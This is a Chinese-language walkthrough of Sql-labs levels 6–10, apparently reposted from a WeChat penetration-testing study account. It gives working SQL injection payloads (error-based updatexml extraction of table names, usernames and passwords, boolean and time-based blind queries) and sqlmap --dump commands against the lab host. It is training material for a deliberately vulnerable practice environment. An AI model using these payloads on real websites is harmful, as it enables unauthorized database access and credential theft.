Sql-labs(6-10)

2022年3月31日12:20:38评论54 views字数 1384阅读4分36秒阅读模式

Less-6

第六关，通过判断，是双引号报错，再进行-- -注释；

id=6"-- -

Sql-labs(6-10)

进行报错注入，原理同上；

id=6" and updatexml(1,concat(1,database(),0x7e),1)-- -id=6" and updatexml(1,concat(1,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- -id=6" and updatexml(1,concat(1,(select column_name from information_schema.columns where table_name="users" limit 0,1),0x7e),1)-- -id=6" and updatexml(1,concat(1,(select (username) from users limit 0,1),0x7e),1)-- -id=6" and updatexml(1,concat(1,(select (password) from users limit 0,1),0x7e),1)-- -

Sql-labs(6-10)

Less-7

第七关，这边发现，没有回显，只有ture和false；这边通过判断发现单引号会报错，那么尝试注释，发现还是不行，说明没闭合，那就加括号尝试，发现'))-- -显示为ture

id=7'))-- -

Sql-labs(6-10)

这里只能用盲注，盲注有时间盲注和布尔盲注，这里使用布尔盲注进行测试
if（判断语句，1，0）；if判断语句，ture则输出1，false则输出0；

id=7')) and if (substring(database(),1,1)="s",1=1,1=2)-- -

Sql-labs(6-10)

同理可以测出所有信息，这里就不一一测了，上sqlmap；sqlmap的安装教程自行百度

python sqlmap.py -u "http://ip:55209/Less-7/?id=7" --dump

Sql-labs(6-10)

Less-8

第八关一开始还是先用单引号报错再注释，看能否闭合

Sql-labs(6-10)

找到注入点，进行注入测试，无回显，使用盲注

//数据库的第一个字符是 s?id=8' and if (ascii(substring(database(),1,1))>114,1=1,1=2)-- -

Sql-labs(6-10)

同理就可以测出数据库名、表名、字段名、账户密码等,这里就直接用sqlmap跑出来；

Sql-labs(6-10)

Less-9

第九关找注入

?id=1' and if (1=1,sleep(10),1=1)-- -

Sql-labs(6-10)

制定payload进行注入

?id=1' and if (ascii(substring(database(),1,1))>114,sleep(10),1=1)-- -

Sql-labs(6-10)

由此可以判断出数据库的名称、表名、字段名、账户密码等敏感信息，这里用sqlmap跑一下

Sql-labs(6-10)

Less-10

这里还是用老方法进行测试，无回显。用时间盲注测试找到payload

?id=1" and if(1=1,sleep(10),1=1)-- -

Sql-labs(6-10)

制作payload进行测试

//测出数据库名第一个ascii值为115；?id=1" and if(ascii(substring(database(),1,1))>114,sleep(10),1=1)-- -

Sql-labs(6-10)

这里不一一测了，使用sqlmap跑一下

Sql-labs(6-10)

原文始发于微信公众号（SUMMER渗透学习）：Sql-labs(6-10)

左青龙
微信扫一扫

右白虎
微信扫一扫

Sql-labs(6-10)

【论文速读】|理解基于大语言模型的模糊测试驱动程序生成

Web攻击应急响应 | 干货

基于ChatGPT大语言模型，通过聊天机器人自动创建vulhub的漏洞靶机环境

科恩BinaryAI@ICSE2024论文解读｜基于大模型的二进制软件成分分析

网络认证：一文带你了解Juniper认证体系！

eBPF及HTTPS明文抓包的分析

京师心智心理健康测评系统 MyReport.ashx 信息泄露漏洞复现

shiro反序列化漏洞绕waf防护的方法总结 | 干货

关于我挖洞的经历

LLM 安全 | 大语言模型应用安全入门

发表评论

在线咨询

微信